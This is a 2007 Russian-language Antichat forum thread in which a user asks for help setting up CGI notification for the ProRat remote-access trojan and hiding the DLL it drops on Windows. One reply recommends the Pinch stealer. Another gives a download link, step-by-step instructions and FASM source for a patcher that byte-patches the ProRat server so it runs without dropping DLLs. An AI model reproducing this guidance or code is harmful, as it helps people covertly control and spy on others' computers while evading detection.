ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ProRat нужна помощь
  #1  
Старый 23.07.2007, 01:44
Аватар для Zedo83
Zedo83
Познающий
Регистрация: 14.07.2007
Сообщений: 90
Провел на форуме:
108080

Репутация: 47
Arrow ProRat нужна помощь

имею ProRat 1.9SE
хочу нормально замутить CGI нотификацию

зарегился на фри хосте http://www.hostland.su/ который это поддерживает, закинул в папку cgi-bin выставил атрибуты для файлов как в справке написано захожу по ссылке http://www.mysite.xxx.ru/cgi-bin/prorat.cgi

и меня редиректит на другие сайты
че не таг ?


p.s. как спрятать dll прората которую он закидывает в винду
 
Ответить с цитированием

  #2  
Старый 03.08.2007, 00:30
Аватар для NetSter
NetSter
студент
Регистрация: 30.07.2007
Сообщений: 800
Провел на форуме:
4275992

Репутация: 1188


По умолчанию

чем тебе пинч не катит?...
 
Ответить с цитированием

  #3  
Старый 06.08.2007, 00:31
Аватар для Zedo83
Zedo83
Познающий
Регистрация: 14.07.2007
Сообщений: 90
Провел на форуме:
108080

Репутация: 47
По умолчанию

если бы ты знал разницу между системами удаленного администрирования типа Бэкдор и троянами, ты бы не задавал таких глупых вопросов
 
Ответить с цитированием

  #4  
Старый 07.08.2007, 13:15
Аватар для Lamia
Lamia
Участник форума
Регистрация: 11.07.2007
Сообщений: 190
Провел на форуме:
254313

Репутация: 185
По умолчанию

ProRat прекрасно работает и без DLL.
Вот патч который не даёт дллкам выпорхнуть...

http://rapidshare.com/files/47467165/_.rar.html

Внутри архива сам патч,а так же упаковщик UPX и оболочька к нему!
Порядок действий:
1)Скачиваешь архив с патчем.
2)Настраеваешь ,делаешь сервер.
3)Открываешь файл upxshell--нажимаешь на декомпресию,и декомпресируешь сервер.
4)Затем берёшь файл @.exe и патчишь сервер про рата.
А это для желающих компилить самим.
; FASM
Код:
format PE GUI 4.0
entry start
include 'include\win32a.inc'

 files_h	      dd ?
 maps_h 	      dd ?
 map_addr	      dd ?
 ofn		      OPENFILENAME
 FilterString	      db 'All Files',0,'*.*',0,0
 buffer 	      db  1024 dup(?)
 
start:


	  mov	     [ofn.lStructSize],sizeof.OPENFILENAME
	  mov	     [ofn.lpstrFilter],FilterString
	  mov	     [ofn.lpstrFile],buffer
	  mov	     [ofn.nMaxFile],1024
	  mov	     [ofn.Flags],OFN_FILEMUSTEXIST or OFN_PATHMUSTEXIST or OFN_LONGNAMES or OFN_EXPLORER or OFN_HIDEREADONLY
	  invoke     GetOpenFileName,ofn
	  cmp	     eax,1
	  jne	     exit
	  call	     Create
      exit:
	  invoke     ExitProcess,eax



Create:
	   xor	esi,esi
	   invoke CreateFile,buffer,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,esi
	   mov	[files_h],eax
	   invoke   CreateFileMapping,eax,esi,PAGE_READWRITE,esi,esi,esi
	   mov	[maps_h],eax
	   invoke  MapViewOfFile,eax,FILE_MAP_WRITE,esi,esi,esi
	   mov	[map_addr],eax
	   mov ax,0c58ch
	   mov cl,0c3h
	   mov [eax],cl
	   mov ax,0c784h
	   mov [eax],cl
	   invoke     UnmapViewOfFile,[map_addr]
	   invoke     CloseHandle,[maps_h]
	   invoke     CloseHandle,[files_h]
	   mov eax,0
	   ret




data import
		     
  library kernel32,'KERNEL32.DLL',\
	  comdlg32,'COMDLG32.DLL',\ 
	  shell32,'SHELL32.DLL' 
		     
  include 'include\APIA\kernel32.inc'
  include 'include\APIA\comdlg32.inc'
  include 'include\APIA\shell32.inc'
		     
end data
Взято с http://damagelab.org....который увы уже не работает.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужна помощь! Black_Death Болталка 7 11.12.2004 16:03
Нужна помощь... Чаты 2 24.02.2003 02:17
Нужна помощь Амир Чаты 0 04.09.2002 11:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ